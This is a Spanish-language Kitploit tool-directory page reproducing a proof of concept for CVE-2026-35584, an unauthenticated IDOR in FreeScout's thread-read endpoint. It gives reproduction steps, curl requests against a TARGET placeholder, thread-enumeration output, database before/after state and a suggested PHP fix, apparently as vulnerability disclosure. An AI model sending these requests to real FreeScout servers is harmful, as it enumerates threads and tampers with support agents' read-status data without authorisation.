Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-35584 — Prueba de concepto de explotación para una vulnerabilidad IDOR no autenticada en FreeScout que permite la enumeración de hilos y la manipulación del estado de lectura mediante solicitudes HTTP manipuladas. | Kitploit
Herramientas/GitHubGitHub/spoo1k/cve-2026-35584
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubspoo1k/cve-2026-35584

CVE-2026-35584

Prueba de concepto de explotación para una vulnerabilidad IDOR no autenticada en FreeScout que permite la enumeración de hilos y la manipulación del estado de lectura mediante solicitudes HTTP manipuladas.

Ver Repositorio
hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-35584

POC - CVE-2026-35584 FreeScout

Descripción

Resumen

El endpoint GET /thread/read/{conversation_id}/{thread_id} no requiere autenticación y no valida si el thread_id proporcionado pertenece al conversation_id dado. Esto permite que cualquier atacante no autenticado pueda:

Marcar cualquier hilo como leído pasando IDs arbitrarios Enumerar IDs de hilos válidos mediante códigos de respuesta HTTP (200 vs 404) Manipular las marcas de tiempo opened_at entre conversaciones (IDOR)

root@kitploit:~
Versión afectada
1.8.211 (última)

Pasos para reproducir

Crear dos conversaciones (conv_id=1 y conv_id=2) Crear un hilo en la conversación 2 (thread_id=3) Sin ninguna autenticación, enviar: GET /thread/read/1/3 Verificar en la base de datos — opened_at del thread_id=3 ahora está establecido, a pesar de haberse accedido mediante el conversation_id incorrecto

PoC

root@kitploit:~
curl -v "http://TARGET/thread/read/1/3"

Devuelve HTTP 200 y establece opened_at en el hilo 3

Impacto

No se requiere autenticación IDOR: thread_id no se valida contra conversation_id Enumeración de hilos: HTTP 200 = hilo válido, 404 = inválido Manipulación de las métricas de leído/no leído utilizadas por los agentes de soporte Rompe el modelo de aislamiento de conversaciones

Corrección sugerida

root@kitploit:~
if ($thread->conversation_id !== (int)$conversation_id) {
abort(403);
}

Salida del PoC

Enumeración de hilos (no autenticado)

root@kitploit:~
curl -v "http://TARGET/thread/read/1/1" → HTTP 200 (hilo válido)
root@kitploit:~
curl -v "http://TARGET/thread/read/1/2" → HTTP 200 (hilo válido)
root@kitploit:~
curl -v "http://TARGET/thread/read/1/3" → HTTP 200 (IDOR - el hilo pertenece a la conversación 2)
root@kitploit:~
curl -v "http://TARGET/thread/read/1/4" → HTTP 404 (hilo inválido)

Estado de la base de datos después de la explotación

Antes: | id | conversation_id | opened_at | | 3 | 2 | NULL |

Después de GET /thread/read/1/3 (sin autenticación): | id | conversation_id | opened_at | | 3 | 2 | 2026-04-03 23:19:46 |

Descargar herramienta